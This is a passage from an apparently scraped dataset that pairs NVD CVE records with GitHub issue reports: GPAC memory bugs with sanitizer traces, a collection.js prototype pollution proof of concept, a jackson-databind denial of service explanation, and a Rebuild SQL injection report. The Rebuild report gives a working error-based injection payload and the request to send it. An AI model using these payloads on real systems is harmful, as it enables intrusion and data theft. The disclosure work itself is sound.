GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce complie and run ``` ./configure --enable-sanitizer make ./MP4Box -info poc ``` information reported by sanitizer ``` [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] unknown OBU type 12 (size 100). Skipping. [AV1] computed OBU size -1 (input value = 0). Skipping. ================================================================= ==4000990==ERROR: AddressSanitizer: attempting double-free on 0x615000013400 in thread T0: #0 0x7fe4a288c40f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x7fe49b5abbd9 in gf_free utils/alloc.c:165 #2 0x7fe49c378e6f in gf_av1_reset_state media_tools/av_parsers.c:4024 #3 0x7fe49d61b5db in av1dmx_finalize filters/reframe_av1.c:1246 #4 0x7fe49ce06b63 in gf_fs_del filter_core/filter_session.c:771 #5 0x7fe49c42688d in gf_media_import media_tools/media_import.c:1293 #6 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130 #7 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302 #8 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846 #9 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308 #10 0x55a5ca1bfb6d in _start (/root/gpac/bin/gcc/MP4Box+0x104b6d) 0x615000013400 is located 0 bytes inside of 512-byte region [0x615000013400,0x615000013600) freed by thread T0 here: #0 0x7fe4a288cc3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163 #1 0x7fe49b5abbbb in gf_realloc utils/alloc.c:160 #2 0x7fe49b58ae0e in gf_bs_write_data utils/bitstream.c:1059 #3 0x7fe49c3667af in av1_add_obu_internal media_tools/av_parsers.c:2519 #4 0x7fe49c36785c in av1_populate_state_from_obu media_tools/av_parsers.c:2596 #5 0x7fe49c367d8f in aom_av1_parse_temporal_unit_from_section5 media_tools/av_parsers.c:2623 #6 0x7fe49d616bd4 in av1dmx_parse_av1 filters/reframe_av1.c:1006 #7 0x7fe49d6179ee in av1dmx_process_buffer filters/reframe_av1.c:1084 #8 0x7fe49d61b0ff in av1dmx_process filters/reframe_av1.c:1225 #9 0x7fe49ce6abe4 in gf_filter_process_task filter_core/filter.c:2828 #10 0x7fe49ce156d7 in gf_fs_thread_proc filter_core/filter_session.c:1859 #11 0x7fe49ce18ce8 in gf_fs_run filter_core/filter_session.c:2120 #12 0x7fe49c424742 in gf_media_import media_tools/media_import.c:1228 #13 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130 #14 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302 #15 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846 #16 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308 previously allocated by thread T0 here: #0 0x7fe4a288c808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fe49b5abb69 in gf_malloc utils/alloc.c:150 #2 0x7fe49b57ab5d in gf_bs_new utils/bitstream.c:154 #3 0x7fe49c3661b6 in av1_add_obu_internal media_tools/av_parsers.c:2492 #4 0x7fe49c36785c in av1_populate_state_from_obu media_tools/av_parsers.c:2596 #5 0x7fe49c367d8f in aom_av1_parse_temporal_unit_from_section5 media_tools/av_parsers.c:2623 #6 0x7fe49d606a79 in av1dmx_check_format filters/reframe_av1.c:269 #7 0x7fe49d617838 in av1dmx_process_buffer filters/reframe_av1.c:1075 #8 0x7fe49d61b0ff in av1dmx_process filters/reframe_av1.c:1225 #9 0x7fe49ce6abe4 in gf_filter_process_task filter_core/filter.c:2828 #10 0x7fe49ce156d7 in gf_fs_thread_proc filter_core/filter_session.c:1859 #11 0x7fe49ce18ce8 in gf_fs_run filter_core/filter_session.c:2120 #12 0x7fe49c424742 in gf_media_import media_tools/media_import.c:1228 #13 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130 #14 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302 #15 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846 #16 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 in __interceptor_free ==4000990==ABORTING ``` ## poc https://github.com/xxy1126/Vuln/blob/main/gpac/2
Double free in gf_av1_reset_state media_tools/av_parsers.c:4024
https://api.github.com/repos/gpac/gpac/issues/2387/comments
2
2023-02-02T10:24:45Z
2023-03-21T04:26:10Z
https://github.com/gpac/gpac/issues/2387
1,567,763,524
2,387
4,864
CVE-2023-1452
2023-03-17T07:15:12.947
A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223297 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2386" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/1.mp4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223297" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223297" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/xxy1126/Vuln/blob/main/gpac/1.mp4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.223297" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.223297" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*", "matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2386
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ## version ``` MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce complie and run ``` ./configure --enable-sanitizer make ./MP4Box -info poc ``` information ``` filters/load_text.c:353:14: runtime error: index 2048 out of bounds for type 'char [2048]' ``` ## poc https://github.com/xxy1126/Vuln/blob/main/gpac/1.mp4
Buffer overflow in filters/load_text.c:353:14
https://api.github.com/repos/gpac/gpac/issues/2386/comments
2
2023-02-02T09:53:52Z
2023-03-21T04:44:47Z
https://github.com/gpac/gpac/issues/2386
1,567,701,993
2,386
4,865
CVE-2023-26113
2023-03-18T05:15:52.937
Versions of the package collection.js before 6.8.1 are vulnerable to Prototype Pollution via the extend function in Collection.js/dist/node/iterators/extend.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://github.com/kobezzza/Collection/blob/be32c48e68f49d3be48a58e929d1ab8ff1d2d19c/dist/node/iterators/extend.js%23L324" }, { "source": "report@snyk.io", "tags": [ "Patch" ], "url": "https://github.com/kobezzza/Collection/commit/d3d937645f62f37d3115d6aa90bb510fd856e6a2" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kobezzza/Collection/issues/27" }, { "source": "report@snyk.io", "tags": [ "Patch", "Release Notes" ], "url": "https://github.com/kobezzza/Collection/releases/tag/v6.8.1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-COLLECTIONJS-3185148" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/kobezzza/Collection/blob/be32c48e68f49d3be48a58e929d1ab8ff1d2d19c/dist/node/iterators/extend.js%23L324" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/kobezzza/Collection/commit/d3d937645f62f37d3115d6aa90bb510fd856e6a2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kobezzza/Collection/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes" ], "url": "https://github.com/kobezzza/Collection/releases/tag/v6.8.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-COLLECTIONJS-3185148" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:collection.js_project:collection.js:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "27735FC6-ED7E-4FDD-8F74-1E22F837B8A4", "versionEndExcluding": "6.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/kobezzza/Collection/issues/27
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kobezzza", "Collection" ]
Hi,i found the prototype pollution when use the function extend(). The extend function at line 319 in file Collection.js/dist/node/iterators/extend js passes obj the inner value of args, whose stereotype contains the test attribute the POC is : var collection = require("collection.js") bad_payload = JSON.parse('{"__proto__":{"polluted":"yes"}}'); collection.extend(true,{},bad_payload) console.log("result:"+ {}.polluted) the risk line is here: https://github.com/kobezzza/Collection/blob/be32c48e68f49d3be48a58e929d1ab8ff1d2d19c/dist/node/iterators/extend.js#L324
Prototype pollution in function extend()
https://api.github.com/repos/kobezzza/Collection/issues/27/comments
2
2022-12-28T12:24:20Z
2023-03-10T14:22:39Z
https://github.com/kobezzza/Collection/issues/27
1,512,745,041
27
4,866
CVE-2021-46877
2023-03-18T22:15:11.357
jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/3328" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Release Notes" ], "url": "https://groups.google.com/g/jackson-user/c/OsBsirPM_Vw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/3328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Release Notes" ], "url": "https://groups.google.com/g/jackson-user/c/OsBsirPM_Vw" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "439EA36C-3D2E-4B27-B36B-AECEC34E0D8A", "versionEndExcluding": "2.12.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:-:*:*:*:*:*:*", "matchCriteriaId": "28B35307-C357-43CD-9201-52974EB429EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F2CB4DE8-6230-4E88-98B0-F94C87B1ED29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "F4EC2939-0A70-4587-B14A-335D62C3F901", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/FasterXML/jackson-databind/issues/3328
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
There is a report on possible DoS attack, against certain versions of Jackson 2.10.x - 2.13.x (does not affect earlier versions like 2.9, nor future 2.14 and 3.0). CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-46877 Fix has been included in versions: * 2.12.6 * 2.13.1 No current plans to back-porting into 2.10 or 2.11 branches (2.9 and earlier not affected). ------ # CVE description ## Applicability The vulnerability is available only when using _JDK serialization_ to serialize, deserialize `JsonNode` values: this is not something most users ever do, nor is it recommended for general usage. So, any other use of `JsonNode` is completely unrelated to the reported CVE: this ONLY APPLIES WITH JDK SERIALIZATION. ## Example So how does one use JDK Serialization with Jackson's `JsonNode`? Example of such usage (copied from test `NodeJDKSerializationTest.java`) is: ``` ObjectNode root = MAPPER.createObjectNode(); root.put("answer", 42); // Instead of usual "write as JSON" (using "node.toString()" or serialize using ObjectMapper) // something wants to use JDK serialization: some caching frameworks do this ByteArrayOutputStream bytes = new ByteArrayOutputStream(); ObjectOutputStream obOut = new ObjectOutputStream(bytes); obOut.writeObject(root); obOut.close(); byte[] jdkSer = bytes.toByteArray(); // and somewhere something wants to read it back like so: ObjectInputStream objIn = new ObjectInputStream(new ByteArrayInputStream(jdkSer)); ObjectNode fromSer = (ObjectNode) objIn.readObject(); // ^^^^ to cause DoD, attacker would need to produce a specifically changed version of // payload! ``` The issue with JDK serialization is due to combination of format used and original code (see class `NodeSerialization` for details). First: `JsonNode` is serialized as a sequence of bytes where first 4 bytes indicate length of actual content; and contents are JSON serialization itself. When reading it back (JDK deserialization) length is read first, original code allocates a `byte[]` with that size, and then contents are read. This works, functionally speaking. But if attacker provides, instead, a payload that contains only 4-byte length, with value of `Integer.MAX_VALUE`, then decoder will: 1. Read the length 2. Allocate 2 gig `byte[]` array 3. If it succeeds, try to read contents, fail The problem here is that during step (2), a large buffer allocation may well run process out of (heap) memory -- especially so if attacker manages to inject multiple broken messages. Fix is to avoid eager allocation of big buffers and only allocate buffers as needed, along reading of the payload.
Possible DoS if using JDK serialization to serialize `JsonNode` [CVE-2021-46877]
https://api.github.com/repos/FasterXML/jackson-databind/issues/3328/comments
21
2021-11-20T02:09:34Z
2023-03-24T16:49:50Z
https://github.com/FasterXML/jackson-databind/issues/3328
1,059,035,707
3,328
4,867
CVE-2023-1495
2023-03-19T00:15:12.677
A vulnerability classified as critical was found in Rebuild up to 3.2.3. Affected by this vulnerability is the function queryListOfConfig of the file /admin/robot/approval/list. The manipulation of the argument q leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c9474f84e5f376dd2ade2078e3039961a9425da7. It is recommended to apply a patch to fix this issue. The identifier VDB-223381 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/getrebuild/rebuild/commit/c9474f84e5f376dd2ade2078e3039961a9425da7" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/594" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223381" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/getrebuild/rebuild/commit/c9474f84e5f376dd2ade2078e3039961a9425da7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/594" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223381" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "matchCriteriaId": "3055AC72-F415-4504-952E-1E891C67D61C", "versionEndExcluding": null, "versionEndIncluding": "3.2.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/getrebuild/rebuild/issues/594
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "getrebuild", "rebuild" ]
### ็‰ˆๆœฌ / Version <=3.2.3 ### ไป€ไนˆ้—ฎ้ข˜ / What's the problem ๅœจrebuild็ณป็ปŸ็š„/admin/robot/approval/listๆŽฅๅฃไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system. ### ๅฆ‚ไฝ•ๅค็Žฐๆญค้—ฎ้ข˜ / How to reproduce this problem #### ๅŠŸ่ƒฝ็‚น / Function points ![sql1_5](https://user-images.githubusercontent.com/97539349/225795720-fb10bb38-ed78-45e2-a554-8b4f25dec5f8.png) #### ๆœ็ดขๅŠŸ่ƒฝ็š„่ฏทๆฑ‚ๆŠฅๆ–‡ / Request message for search function ``` GET /admin/robot/approval/list?entity=&q=1&_=1678979432278 HTTP/1.1 Host: 192.168.0.102:18080 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=utf-8 Referer: http://192.168.0.102:18080/admin/robot/approvals Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; JSESSIONID=78BDF749546E83FB68398994E888984E; _ga_CC8EXS9BLD=GS1.1.1678979231.2.1.1678979433.0.0.0 Connection: close ``` #### ๆ”ปๅ‡ป่ฝฝ่ท / payload `%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+` #### ๆผๆดžๅค็Žฐ / Vulnerability recurrence ![sql1_6](https://user-images.githubusercontent.com/97539349/225796517-478b9774-7d19-499e-8033-ff20a4647703.png) ### ็ณป็ปŸ็Žฏๅขƒ (ๆ“ไฝœ็ณป็ปŸ/MySQL็‰ˆๆœฌ/ๆต่งˆๅ™จ็ญ‰) / System environment (OS/MySQL/Browser etc) Mysql 5.7.26 Windows JDK1.8.0_341 Chrome ### ่ฏดๆ˜Ž / Suggested description sql injection vulnerability exists in rebuild <=3.2.3 ๅœจrebuild็ณป็ปŸๅฐไบŽ3.2.3็‰ˆๆœฌไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž Failed to legally check parameters, resulting in SQL injection vulnerabilities. ๆœช่ƒฝๅˆๆณ•ๆฃ€ๆŸฅๅ‚ๆ•ฐไปŽ่€Œๅฏผ่‡ดsqlๆณจๅ…ฅๆผๆดž. #### ๆผๆดž็ฑปๅž‹ / Vulnerability Type SQLi #### ไบงๅ“ไพ›ๅบ”ๅ•† / Vendor of Product https://github.com/getrebuild/rebuild #### ๅ—ๅฝฑๅ“็š„ไบงๅ“ไปฃ็ ๅบ“ / Affected Product Code Base <=3.2.3 #### ๅ—ๅฝฑๅ“็ป„ไปถ / Affected Component /admin/robot/approval/list #### ๆ”ปๅ‡ปๆ–นๅผ / Attack Type Remote ### ๆผๆดžๆˆๅ›  / Cause of vulnerability Interface:/admin/robot/approval/list In the `com.build.web.robot.approval.ApprovalAdminController#approvalList()` method, the SQL statement is created and passed into the `queryListOfConfig()` method. ๅœจcom.rebuild.web.robot.approval.ApprovalAdminController#approvalListๆ–นๆณ•ไธญ๏ผŒSQL่ฏญๅฅ่ขซๅˆ›ๅปบ๏ผŒๅนถไผ ๅ…ฅqueryListOfConfig()ๆ–นๆณ•ใ€‚ ![sql1_1](https://user-images.githubusercontent.com/97539349/225796769-224640fb-7898-41a4-91ee-a13bc078683b.png) In the `com.rebuild.web.admin.ConfigCommons#queryListOfConfig()` method, replace the user's incoming data into the SQL statement, and call the `escapeSql()` method to process the user's input data. ๅœจcom.rebuild.web.admin.ConfigCommons#queryListOfConfig()ๆ–นๆณ•ไธญ๏ผŒๅฐ†็”จๆˆทไผ ๅ…ฅๆ•ฐๆฎๆ›ฟๆข่‡ณSQL่ฏญๅฅไธญ๏ผŒๆญคๆ—ถ่ฐƒ็”จescapeSql()ๆ–นๆณ•ๅฏน็”จๆˆท็š„่พ“ๅ…ฅๆ•ฐๆฎ่ฟ›่กŒๅค„็† ![sql1_2](https://user-images.githubusercontent.com/97539349/225796837-08b36aab-4d52-410e-8d51-f55c1ec8b1f6.png) In the `escapeSql()` method, replace one single quotation mark in user input with two single quotation marks. escapeSql()ๆ–นๆณ•ไธญ๏ผŒๅฐ†็”จๆˆท่พ“ๅ…ฅไธญ็š„ไธ€ไธชๅ•ๅผ•ๅทๆ›ฟๆขไธบไธคไธชๅ•ๅผ•ๅท ![sql1_3](https://user-images.githubusercontent.com/97539349/225796950-3ecc1fa7-1a02-40c0-833f-c6a476718e42.png) Attackers can escape redundant quotes to achieve SQL injection ๆ”ปๅ‡ป่€…ๅฏไปฅ้€š่ฟ‡่ฝฌไน‰็š„ๆ–นๅผๅฐ†ๅคšไฝ™็š„ๅผ•ๅทๅค„็†ๆމ๏ผŒไปŽ่€Œๅฎž็ŽฐSQLๆณจๅ…ฅ Then directly call `createQuery()` to query 